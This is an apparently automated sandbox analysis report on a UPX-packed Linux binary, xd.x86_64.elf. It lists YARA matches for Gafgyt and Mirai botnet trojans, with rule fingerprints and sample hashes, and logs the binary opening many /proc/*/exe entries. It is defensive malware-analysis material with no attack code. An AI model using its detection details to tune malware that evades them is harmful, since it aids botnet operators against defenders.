      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: classification engineClassification label: mal88.spre.troj.evad.linELF@0/16@3/0

      Data Obfuscation

      barindex
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

      Persistence and Installation Behavior

      barindex
      Source: /bin/fusermount (PID: 6433)File: /proc/6433/mountsJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1582/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/3088/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/230/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/110/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/231/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/111/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/232/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1579/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/112/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/233/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1699/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/113/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/234/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1335/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1698/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/114/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/235/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1334/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1576/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/2302/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/115/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/236/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/116/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/237/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/117/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/118/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/910/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/119/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/912/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/10/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/2307/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/11/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/918/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/12/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/13/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/14/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/15/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/16/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/17/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/18/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1594/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/120/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/121/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1349/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/122/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/243/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/123/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/2/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/124/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/3/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/4/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/125/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/126/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1344/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1465/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1586/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/127/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/6/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/248/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/128/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/249/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1463/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/800/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/9/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/801/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/20/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/21/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1900/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/22/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/23/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/24/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/25/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/26/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/27/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/28/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/29/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/491/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/250/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/130/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/251/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/252/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/132/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/253/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/254/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/4508/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/255/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/256/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1599/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/257/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1477/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/379/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/258/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1476/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/259/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1475/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/936/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/30/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/2208/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/6263/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/35/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/6264/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1809/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/1494/exeJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)File opened: /proc/260/exeJump to behavior
      Source: /usr/bin/gpu-manager (PID: 6383)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6385)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6388)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6391)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6393)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6396)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6399)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6402)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /bin/sh (PID: 6384)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6386)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6389)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
